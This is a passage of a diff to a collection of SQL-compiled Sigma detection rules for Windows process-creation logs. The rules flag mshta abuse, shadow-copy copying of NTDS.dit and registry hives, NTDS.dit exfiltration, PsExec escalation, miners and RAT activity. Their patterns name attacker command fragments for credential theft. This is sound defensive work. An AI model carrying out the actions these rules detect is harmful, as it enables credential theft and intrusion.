"attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "Renamed ProcDump Execution", - "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", - "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2022-29072 
Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "status": "experimental", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "cve.2022.29072" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "PUA - AdvancedRun Suspicious Execution", + "id": 
"fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, 
oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug 
Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE 
'%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child 
processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, 
{ - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup 
scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% 
--cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + 
